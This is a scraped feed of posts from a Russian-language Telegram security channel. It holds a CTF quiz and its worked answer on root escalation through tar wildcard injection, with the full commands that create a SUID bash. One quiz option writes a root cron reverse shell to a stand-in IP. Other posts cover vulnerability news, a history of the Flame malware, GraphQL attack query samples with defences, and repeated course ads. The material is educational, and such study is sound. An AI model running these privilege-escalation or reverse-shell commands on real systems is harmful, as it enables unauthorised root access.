Сценарий: shell от www-data, sudo нет, SUID чистые.
Нашли cron:
* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *
Права:
drwxrwxrwx 2 www-data www-data /var/www/html
-rwxr-xr-x 1 root root /opt/scripts/backup.sh
Цель: root shell через wildcard injection
🔥
echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh»
👾
ln -s /etc/shadow shadow.txt
tar -czf exploit.tar.gz shadow.txt
❤️
echo '* * * * * root bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /etc/cron.d/rev
🤩
chmod 777 /opt/scripts/backup.sh
echo "cp /bin/bash /tmp/r && chmod +s /tmp/r" > /opt/scripts/backup.sh
Подсказка:
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩6❤1🔥1🥰1👾1
🔥 На рынке сейчас математика — снова король: AI растёт быстрее, чем вузы успевают обновлять программы. Мы же перестраиваем курс под индустрию мгновенно.
Хочешь наконец разобраться в математике для DS, а не гуглить «что такое градиент» перед собесом?
Новый курс «Математика для разработки AI-моделей» — это 8 недель плотной подготовки, свежая программа и только актуальные темы, которые реально нужны в ML.
Что в курсе:
→ линал, производные, градиенты, вероятности, статистика;
→ практика на Python и 3 большие ДЗ;
→ живые вебинары + разбор ваших вопросов;
→ финальный мини-проект, который можно положить в портфолио;
→ доступ к материалам и чат с экспертами.
Для старта нужны только школьная математика и базовый Python.
🎁 Бонусы ноября:
— скидка 40% до 30 ноября;
— «Базовая математика» в подарок при оплате;
→ бесплатный тест уровня математики.
👉 Записывайся на курс
Хочешь наконец разобраться в математике для DS, а не гуглить «что такое градиент» перед собесом?
Новый курс «Математика для разработки AI-моделей» — это 8 недель плотной подготовки, свежая программа и только актуальные темы, которые реально нужны в ML.
Что в курсе:
→ линал, производные, градиенты, вероятности, статистика;
→ практика на Python и 3 большие ДЗ;
→ живые вебинары + разбор ваших вопросов;
→ финальный мини-проект, который можно положить в портфолио;
→ доступ к материалам и чат с экспертами.
Для старта нужны только школьная математика и базовый Python.
🎁 Бонусы ноября:
— скидка 40% до 30 ноября;
— «Базовая математика» в подарок при оплате;
→ бесплатный тест уровня математики.
👉 Записывайся на курс
🥰4
Please open Telegram to view this post
VIEW IN TELEGRAM
😁8🥰3
Обнаружена цепочка из 5 критических уязвимостей в Fluent Bit — инструменте для сбора логов, развёрнутом более 15 миллиардов раз.
• CVE-2025-12972: path traversal через несанитизированные теги → запись произвольных файлов и RCE
• CVE-2025-12970: переполнение буфера в Docker-плагине через длинные имена контейнеров
• CVE-2025-12969: обход аутентификации в in_forward плагине
CISA выпустила предупреждение об активном использовании коммерческого шпионского ПО и RAT против пользователей мессенджеров.
• Фишинг с поддельными QR-кодами для привязки устройств
• Zero-click эксплойты (включая CVE-2025-21042 для доставки Android-шпиона LANDFALL)
• Поддельные версии мессенджеров (ProSpy, ToSpy, ClayRat)
ФБР получило более 5,100 жалоб на мошенничество с захватом аккаунтов (ATO), приведшее к убыткам более $262 миллионов с начала года.
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🥰2🔥1
В cron у root:
* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *
Каталог доступен для записи www-data (777).
Команда tar * раскрывает имена файлов как аргументы. Если подложить файлы, имитирующие флаги, tar воспримет их как реальные параметры и выполнит произвольную команду от root.
Payload, который нужно поместить в /var/www/html:
echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh"
--checkpoint заставит tar выполнить x.sh в процессе архивации.
Скрипт создаёт /tmp/r — копию bash с SUID-битом.
После срабатывания cron:
/tmp/r -p
Вы получаете root.
запись в cron.d недоступна, shadow в архив ничего не даёт,
backup.sh не перезаписать.Правильный ответ: 🔥
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5🔥2👍1👾1
🎄 Скоро Новый год, а ты всё ещё не в бигтехе?
Если твой путь лежит в ML, DS или AI, то одна вещь решает всё: математика. Без неё — хоть три проекта сделай, хоть сотню туториалов посмотри — на собесе тебя всё равно вернут на «а что такое градиент?»
🔥 Экспресс-курс «Математика для разработки AI-моделей» — 8 недель, чтобы закрыть базу раз и навсегда.
Что внутри:
🔘 живые вебинары, где можно задавать вопросы экспертам
🔘 записи лекций + доступ к материалам
🔘 практические задания на Python и финальный мини-проект с фидбеком
🔘 программа обновлена в ноябре 2025
🔘 2 месяца только нужного — без воды
🔘 достаточно школьной математики и базового Python
🎁 Бонусы ноября:
→ 40% скидка до 30 ноября
→ при оплате до конца месяца — курс «Базовая математика» в подарок
→ бесплатный тест, чтобы узнать свой уровень математики
👉 Хочу стартовать
Если твой путь лежит в ML, DS или AI, то одна вещь решает всё: математика. Без неё — хоть три проекта сделай, хоть сотню туториалов посмотри — на собесе тебя всё равно вернут на «а что такое градиент?»
🔥 Экспресс-курс «Математика для разработки AI-моделей» — 8 недель, чтобы закрыть базу раз и навсегда.
Что внутри:
🔘 живые вебинары, где можно задавать вопросы экспертам
🔘 записи лекций + доступ к материалам
🔘 практические задания на Python и финальный мини-проект с фидбеком
🔘 программа обновлена в ноябре 2025
🔘 2 месяца только нужного — без воды
🔘 достаточно школьной математики и базового Python
🎁 Бонусы ноября:
→ 40% скидка до 30 ноября
→ при оплате до конца месяца — курс «Базовая математика» в подарок
→ бесплатный тест, чтобы узнать свой уровень математики
👉 Хочу стартовать
🥰4
GitHub с PoC'ами — стандарт. HackerOne и Bugcrowd — база. Но половину инсайтов вы выцепили не оттуда.
Это мог быть разбор CVE в чьём-то блоге. Техника из старого write-up на CTFtime. Обсуждение в закрытом дискорде. Или канал в тг, где кто-то постит свежие находки раньше всех.
Что в вашем арсенале
— Каналы и блоги, которые читаете первыми
— Источники PoC и exploit research
— Комьюнити, где делятся методологиями
— Исследователи, за которыми следите
Кидайте ссылки. Может, найдём что-то новое для себя
#resourse_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3👍1
Кастомные скрипты для атак — вы:
❤️ — Пишу постоянно (почти каждый проект)
👍 — Пишу иногда (когда тулзы не подходят)
👾 — Писал пару раз (в основном готовые)
🔥 — Никогда не писал (зачем, если есть Metasploit?)
Интересно, сколько реально кодят vs просто запускают готовое.
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики
#tool_vs_tool
Please open Telegram to view this post
VIEW IN TELEGRAM
👾6👍5❤2🔥2🥰2
В предыдущем посте мы разобрали, как Тринити «взламывает» SSH за секунды. Теперь — что фильм не показал.
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍2🥰2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7😁2
Flame — это не вирус. Это полноценная платформа для киберразведки, которая превращала компьютер в жучок для прослушки.
📦 Аномальный размер
20 МБ — огромная редкость для вредоносного ПО (обычно 50-200 КБ).
Внутри:
— 20+ модулей с разными функциями
— Виртуальная машина Lua
— База данных SQLite для хранения украденных данных
🎯 Арсенал шпионажа:
• Скриншоты — снимки экрана при работе с мессенджерами и браузерами
• Аудиозапись — включение микрофона для записи разговоров
• Bluetooth-перехват — извлечение данных из телефонов поблизости
• Сетевой сниффинг — перехват паролей в локальной сети
• USB-распространение — заражение флешек для проникновения в изолированные сети
2008-2010 — предполагаемое начало работы
Май 2012 — обнаружение Kaspersky Lab
Июнь 2012 — операторы отправили команду на самоуничтожение на большинство заражённых машин
✓ Работал незамеченным 2-4 года
✓ Модульная архитектура — мог адаптироваться под каждую цель
✓ Мог удалять все следы по команде
✓ Уровень разработки указывает на государственное финансирование
Flame показал новую эру кибершпионажа: вредоносное ПО как долгосрочная разведоперация. Цифровой жучок, живущий в компьютере годами и собирающий всё — от паролей до разговоров в комнате.
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰4👍2🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 Хочешь строить свои AI-модели, а не просто запускать чужие?
Proglib.academy открывает курс «Математика для разработки AI-моделей» — программу, которая превращает понимание ML из «черного ящика» в осознанную инженерную работу.
📌 Почему без математики в AI никуда:
→ Чтобы пройти собеседование. Это первый фильтр: линал, матстат, оптимизация — спрашивают везде.
→ Чтобы понимать процесс изнутри. Инженер AI должен понимать, почему и как работает модель, а не просто жать fit().
🎓 Что будет на курсе:
→ 3 практических задания на Python + финальный проект с разбором от специалистов;
→ программа обновлена в ноябре 2025;
→ за 2 месяца пройдёшь весь фундамент, нужный для работы с моделями;
→ преподаватели — гуру математики, методисты и исследователи из ВШЭ и индустрии.
🎁 Бонусы ноября:
— 40% скидка;
— получаешь курс «Школьная математика» в подарок;
— короткий тест и узнать свой уровень.
🔗 Подробнее о курсе
Proglib.academy открывает курс «Математика для разработки AI-моделей» — программу, которая превращает понимание ML из «черного ящика» в осознанную инженерную работу.
📌 Почему без математики в AI никуда:
→ Чтобы пройти собеседование. Это первый фильтр: линал, матстат, оптимизация — спрашивают везде.
→ Чтобы понимать процесс изнутри. Инженер AI должен понимать, почему и как работает модель, а не просто жать fit().
🎓 Что будет на курсе:
→ 3 практических задания на Python + финальный проект с разбором от специалистов;
→ программа обновлена в ноябре 2025;
→ за 2 месяца пройдёшь весь фундамент, нужный для работы с моделями;
→ преподаватели — гуру математики, методисты и исследователи из ВШЭ и индустрии.
🎁 Бонусы ноября:
— 40% скидка;
— получаешь курс «Школьная математика» в подарок;
— короткий тест и узнать свой уровень.
🔗 Подробнее о курсе
🥰3😁1😢1
Что внутри:
— Видеолекции о поиске уязвимостей и защите веб-приложений
— Практические руководства разного уровня сложности
— CTF-задачи — упражнения, где нужно взломать систему и найти спрятанный флаг
Отличный старт для тех, кто хочет освоить пентест и этичный хакинг!
— Скидка 40% на все курсы Академии
— Розыгрыш Apple MacBook
— Бесплатный тест на знание математики
#resourse_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰4👍3🙏2
⚠️ GraphQL Security: атаки, которые работают прямо сейчас
GraphQL массово заменяет REST API, но его безопасность — слабое звено. Компании внедряют быстро, защищают медленно.
🔍 Почему GraphQL опаснее REST:
— один endpoint вместо множества → сложнее мониторить
— клиент сам формирует запрос → больше контроля атакующему
— introspection по умолчанию включен → полная карта API бесплатно
➡️ Как атакуют:
1. Introspection Mining
Запрос
2. Batching Attack
Один HTTP-запрос = 1000 GraphQL-операций. Rate limit обходится тривиально, можно брутить токены/пароли массово.
3. Alias Overloading
Запросить одно и то же поле 10000 раз под разными именами → DoS через CPU exhaustion.
4. Nested Query Bomb
Циклические зависимости в схеме (user→posts→author→posts...) → экспоненциальный рост запросов к БД.
5. Field Suggestions Leak
Опечатка в названии поля? GraphQL сам подскажет правильное — включая приватные поля, которые думали скрыть.
😵 Типичный сценарий атаки:
Пентестеры регулярно находят открытые GraphQL endpoints у SaaS-сервисов. Через introspection обнаруживают internal-запросы типа
🛡 Что делать defenders:
📎 Источники:
→ OWASP GraphQL Cheat Sheet
→ GraphQL Batching Attack
→ Exploiting GraphQL
🐸 Библиотека хакера
#breach_breakdown #graphql
GraphQL массово заменяет REST API, но его безопасность — слабое звено. Компании внедряют быстро, защищают медленно.
— один endpoint вместо множества → сложнее мониторить
— клиент сам формирует запрос → больше контроля атакующему
— introspection по умолчанию включен → полная карта API бесплатно
1. Introspection Mining
Запрос
__schema выдает всю структуру API: типы, поля, аргументы. Даже если endpoint не документирован — получишь full disclosure.
{__schema{types{name,fields{name}}}}
2. Batching Attack
Один HTTP-запрос = 1000 GraphQL-операций. Rate limit обходится тривиально, можно брутить токены/пароли массово.
3. Alias Overloading
Запросить одно и то же поле 10000 раз под разными именами → DoS через CPU exhaustion.
{
user1: user(id:1){name}
user2: user(id:1){name}
...
user9999: user(id:1){name}
}
4. Nested Query Bomb
Циклические зависимости в схеме (user→posts→author→posts...) → экспоненциальный рост запросов к БД.
5. Field Suggestions Leak
Опечатка в названии поля? GraphQL сам подскажет правильное — включая приватные поля, которые думали скрыть.
Пентестеры регулярно находят открытые GraphQL endpoints у SaaS-сервисов. Через introspection обнаруживают internal-запросы типа
adminQuery или internalUserData, которые не были в публичной документации. Результат: массовая утечка данных клиентов.—
отключить introspection в production
(если не нужен публично)
— лимиты на
query depth
(макс. 5-7 уровней) и
complexity
—
persisted queries
вместо arbitrary запросов
— мониторинг аномальных паттернов (>100 алиасов, батчинг >10 запросов)
—
field-level authorization
, а не только endpoint-level
→ OWASP GraphQL Cheat Sheet
→ GraphQL Batching Attack
→ Exploiting GraphQL
#breach_breakdown #graphql
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3❤1👍1